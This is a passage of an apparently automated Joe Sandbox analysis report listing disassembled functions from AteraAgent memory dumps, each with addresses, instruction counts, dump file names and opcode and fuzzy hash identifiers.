                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36ed67d318b542a572018b9ab77b983a5b46d161cd5e35d2e03aa905a67ad044
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C612F321B1DE8F4FEBAC9B6C846597577D2EF98340B4501BEE459C72E6EE24F9028340
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B8335E0 Relevance: .6, Instructions: 584COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 87a118e33018b119544b872ca2e30f96b7d88f9e52bdf38c2852358e7c1f77cc
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: c7c3be443c6c55f8e9024c2f8cc9644aa3405047863d867238412f6ff32eecb5
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87a118e33018b119544b872ca2e30f96b7d88f9e52bdf38c2852358e7c1f77cc
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49020331B0EA4F4FEBA9DB2C846476577E2EF99300F1901B9D44DC73AADE24AD428741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63E345 Relevance: .6, Instructions: 567COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: dc4be4e262d63dfbde7c18e95539589f5f09fedce021c2be47e22c9cb37e0d31
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a333b30dd29d060eea3574b59b2c899bea6d896a8e9d909480333fc34a8923c0
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc4be4e262d63dfbde7c18e95539589f5f09fedce021c2be47e22c9cb37e0d31
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F410622B0EBC91FE755D66C98B55E93FA0EF5622070902F7D4D8CB0B7E918790A8371
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B834F40 Relevance: .5, Instructions: 533COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2b9730ff9d664263d19f64299fcdb733e0ea8ab17db11d07cacb545dca4aa248
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 341e72f0239dfd3fb4aa2998a4ff91e51ed590f0cbe5b38b33e1a355ff5fd5ed
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b9730ff9d664263d19f64299fcdb733e0ea8ab17db11d07cacb545dca4aa248
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F025B32B0EB870FD768DBBCD4A59E57B91EF5935070901BAD0898B2E7DE24F9458380
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6371ED Relevance: .5, Instructions: 488COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7bade8068b3efdc6f45e7199a2fec14f21672b2812f0ee888746b2e38ee87c29
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 24ead042a6962ff736a4bba1dd450275644422f279ad6ad7488f2039e2316fd5
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bade8068b3efdc6f45e7199a2fec14f21672b2812f0ee888746b2e38ee87c29
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF10770B0DB8D4FE7A8EB188465A75B7D2FFA9300F05457DE09DCB2A6DE24B8418742
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83C865 Relevance: .5, Instructions: 456COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c6fc8a666c7cff9a58081efb96ac3e256007e9b3aa83a24cfbd35fb236b84ca9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e4dccde3b4d243bfd0ce09a1beddc18f6da38b36c478bf9281a461b90edea252
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6fc8a666c7cff9a58081efb96ac3e256007e9b3aa83a24cfbd35fb236b84ca9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAE14B30A09A4D8FDF94EF58C4A4AA937E2FFAC744F150169E44DD73A6CA35E941CB80
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B830380 Relevance: .4, Instructions: 446COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3ea8d9ee44b21ae50f975b148b8a481251d96ffae9aa970c64c14ace109b87c7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f3d3072f204cc5346ec6072190eb3a4c5ab25b87cea38917a368e23f6bc2bea6
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ea8d9ee44b21ae50f975b148b8a481251d96ffae9aa970c64c14ace109b87c7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAD1B571B09A4D4FEBA8EB5C88657B877E1FF58700F1440BAD44DC32A6DE34AD818B41
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B640291 Relevance: .4, Instructions: 439COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 761316e5edaa331b1815f7b1ffe0d27b8e0925bed0bea09eccb07c24ef912924
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a5dd643b5602ee88e441dd1d13700712c0f21e7af46ce53a1ea099a5dba32911
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 761316e5edaa331b1815f7b1ffe0d27b8e0925bed0bea09eccb07c24ef912924
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DD10971B0ED9E4FEB95DB6884A17B87BE2EF99710B0501BAD49DCB2E7DD1478028340
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62D9E9 Relevance: .4, Instructions: 439COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 12c8aac051655238402304bf44515e7fe1e1222d03fb72015e26bcb8445252ac
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 292a2fe75a5919176d78d12887ccbd0204c5f0e62921dcbf4dbbe165c296307a
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12c8aac051655238402304bf44515e7fe1e1222d03fb72015e26bcb8445252ac
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8D1433170DB4D4FEB68DB58D455AA5B7E0EFA5310F05027ED08DCB2A2DE26F8468782
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63C998 Relevance: .4, Instructions: 428COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: fa042af7dc6212527fdbb565695866ee2bc86ef58ac0a35a5f469ba049aa5521
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d4b963272b4fd17c877d900cbe55fbea8e33f7a658f9bd8510e8ba8235bd18ea
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa042af7dc6212527fdbb565695866ee2bc86ef58ac0a35a5f469ba049aa5521
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDD1AF30B1EE4D9FEBA8DB1884A577977D2EF99300F15057DE09ECB2A2DE24B8418741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B831518 Relevance: .4, Instructions: 417COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: bfba7311bf9ce68bc2fe264f03c90541d85896b3e9f74cbf4aa049b2357a2749
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7a382ec15475291e9c7625e524e58e1e3bdc5e759a85260ba3dc22f196b1544e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfba7311bf9ce68bc2fe264f03c90541d85896b3e9f74cbf4aa049b2357a2749
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AC1F521B19E4F4FEBAC9B6C84A56B573D2FFA8340B4501B9D01EC72E6DE24F9458780
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62AA88 Relevance: .4, Instructions: 413COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c6b5c6dad5a2801e174fe1c9f48bf0f78db3952be22b5095a5ec3845d41e0434
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d2ad16efdeddc1b30d1683b45039cc220ba54db611ffa8d496d95dfea3dadfc1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6b5c6dad5a2801e174fe1c9f48bf0f78db3952be22b5095a5ec3845d41e0434
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFC1C421B0EA8E4FFBA9DB6C44A967437D1EF95300B0A40BAD45DCB2E7DD18BD458341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63C950 Relevance: .4, Instructions: 413COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3f4d5324285397aab4dad694b4abd643509aaf0a2cafecb9cabd59c7bb540e4d
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7c82f753eff8c31065c7bdd4f58a3526ed1cae8a056251d4fafcab49860ad14b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f4d5324285397aab4dad694b4abd643509aaf0a2cafecb9cabd59c7bb540e4d
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EDC11631B0DF4C4FDB64EB5888656A97BE2EF99300B0501BAE459CB2E2DE24BD418781
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6333B8 Relevance: .4, Instructions: 404COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3ea221a670e40c7e94ed99fafa4e4b6fa719cc011300076b5bcb3cda50f15e1a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 32c8569a10573dba7239ccb794da042c7ecdf3df8fe6e416f122c0562ab4f414
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ea221a670e40c7e94ed99fafa4e4b6fa719cc011300076b5bcb3cda50f15e1a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6D10B62B0F7CA0FE7569BAC98651F83BA1EF56321B0901FBD0A88E0F7D91579068341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6333D7 Relevance: .4, Instructions: 369COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a5783faf75dd8fcba1963b195f7bdd381f0afa0666024f8eababfb89d993c3f7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 572af519e42dc672c4368e043545d3fd2720ac433381168220ece9255849cc33
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5783faf75dd8fcba1963b195f7bdd381f0afa0666024f8eababfb89d993c3f7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9C10862B0F7CA0FE7669BAC98751F83BA1EF56321B0901FBD0A88F1B7D91579058341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62634D Relevance: .4, Instructions: 366COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3abfb381890a3e305d4accc34e83c6bd4d10a962ac0b0db69cac0eee00c86d6d
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: bb301e64bcf836b235a48c05c8ae46864d106b4b671b5b3ac785d89ea0d5328f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3abfb381890a3e305d4accc34e83c6bd4d10a962ac0b0db69cac0eee00c86d6d
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55C19031E0E65E8FEBA5DB68C4657B87BB1FF5A300F5540BAC05DDB292CA346985CB00
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63E363 Relevance: .4, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4501b334a36090dc184f687ae2e076abe5d05dcaa1ab5054e6b80b5d58c7eb62
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 38388b30decbb75ea8ccc8e1eee4f117e91cc3071e51225df55f6f7eec1e286e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4501b334a36090dc184f687ae2e076abe5d05dcaa1ab5054e6b80b5d58c7eb62
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB410562B0EBC91FE766D66C58B55A93FA0EF5622070A01F7D4E8CF0B7E90479098371
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63C3FB Relevance: .4, Instructions: 358COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 71591c5b58ebb7e5343b4125522dfb950d77a46d5c58d0929ba29aaac018f198
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 54ebd30456689e7f0233b20089b22feb9804dc5c0dd66dd7ba2e54b0bf15bbb9
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71591c5b58ebb7e5343b4125522dfb950d77a46d5c58d0929ba29aaac018f198
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47A15A23B0DA5A4FE728B6ACF8A15F83790EF81335B0501B7D19CCA0E3DE1479864681
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63C990 Relevance: .4, Instructions: 353COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 314097f9ddb0bf64205dff36ed7ce5abd69ebae108c142b7f3ccd06e6605b73e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5332bd6c31ad65cffdcd79f53bdb92fe759902209ff82812e93d18cfadb05dc1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 314097f9ddb0bf64205dff36ed7ce5abd69ebae108c142b7f3ccd06e6605b73e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EA1E531B0DF4C5FEB68DB5C98966B977E2FF99310F04017EE04AC72A2DA25B8418781
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B834AFA Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f6b227028f3c9dd6f0078b633363a4536b034f1fb881604696655705bd1427cf
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 006d85bdece68ec5c16089405081c0e43de3a115c909ef815bfbcbedb38fa232
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6b227028f3c9dd6f0078b633363a4536b034f1fb881604696655705bd1427cf
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA16B32A0DB471BEB18EFBCE8A19F13790EF4532571C427AD18D86297DF25B84682C4
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62B8E5 Relevance: .3, Instructions: 348COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ee86b2ef9c5f16191d23ca262993c8cb5cba68e89e97a03848ffc00e7d5f2067
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f4fee59275f250d74249ec2b879c5b5d79df1c1ff945a78206a790cad0c9eda8
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee86b2ef9c5f16191d23ca262993c8cb5cba68e89e97a03848ffc00e7d5f2067
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0A1072070DE490FEBA5EBA8986077577E2EF85320B5542BAC09DCB1E7CA19B9468341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63F245 Relevance: .3, Instructions: 338COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
